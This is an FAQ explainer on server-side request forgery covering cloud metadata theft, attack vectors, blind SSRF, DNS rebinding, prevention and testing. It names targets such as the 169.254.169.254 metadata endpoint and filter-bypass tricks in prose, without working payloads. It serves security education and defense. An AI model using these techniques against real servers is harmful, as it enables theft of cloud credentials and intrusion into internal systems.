What is SSRF (Server-Side Request Forgery)?

SSRF is a vulnerability where attackers trick a server into making requests to unintended internal or external resources, potentially accessing cloud metadata, internal services, or sensitive data.

What is Server-Side Request Forgery?

SSRF (Server-Side Request Forgery) is a vulnerability that allows attackers to induce a server-side application to make HTTP requests to arbitrary destinations. Attackers exploit features that fetch external resources by manipulating URLs to target internal services, cloud metadata endpoints, or other protected infrastructure.

Why is SSRF particularly dangerous in cloud environments?

In cloud environments, SSRF can access instance metadata services (like AWS IMDSv1 at 169.254.169.254) to steal temporary credentials, access tokens, and configuration data. These credentials often grant broad permissions to cloud services, enabling lateral movement, data exfiltration, and full infrastructure compromise.

What are common SSRF attack vectors?

Common SSRF vectors include URL parameters for webhooks, file imports, PDF generators, image processors, URL previews, and API integrations. Attackers manipulate these inputs to target internal IP ranges (10.x, 172.16.x, 192.168.x), localhost services, cloud metadata APIs, and internal microservices.

How do you prevent SSRF vulnerabilities?

Prevention requires input validation with URL allowlists, blocking requests to private IP ranges and metadata endpoints, using network-level segmentation, implementing IMDSv2 for cloud instances, applying DNS resolution validation to prevent DNS rebinding, and running URL-fetching services in isolated network segments with restricted egress.

What is blind SSRF?

Blind SSRF occurs when the application makes the server-side request but does not return the response to the attacker. While the attacker cannot read internal data directly, they can still perform port scanning, trigger actions on internal services, and use out-of-band techniques like DNS exfiltration to confirm connectivity.

How does SSRF relate to the OWASP Top 10?

SSRF was added as a standalone category (A10) in the OWASP Top 10 2021 edition, reflecting its growing prevalence and impact in modern cloud-native architectures. Previously it was grouped under injection flaws, but the shift to microservices and cloud infrastructure elevated its significance.

What is DNS rebinding in the context of SSRF?

DNS rebinding bypasses SSRF protections that validate hostnames at request time. The attacker controls a DNS server that initially resolves to a permitted IP, then switches to an internal IP before the actual HTTP request. This defeats allowlist checks that only validate the initial DNS resolution.

How do you test for SSRF vulnerabilities?

Testing for SSRF involves injecting internal IP addresses, cloud metadata URLs, and out-of-band callback URLs (like Burp Collaborator) into URL parameters. Testers try localhost, 169.254.169.254, internal service endpoints, and use encoding tricks like decimal IPs, IPv6, and URL parsing inconsistencies to bypass filters.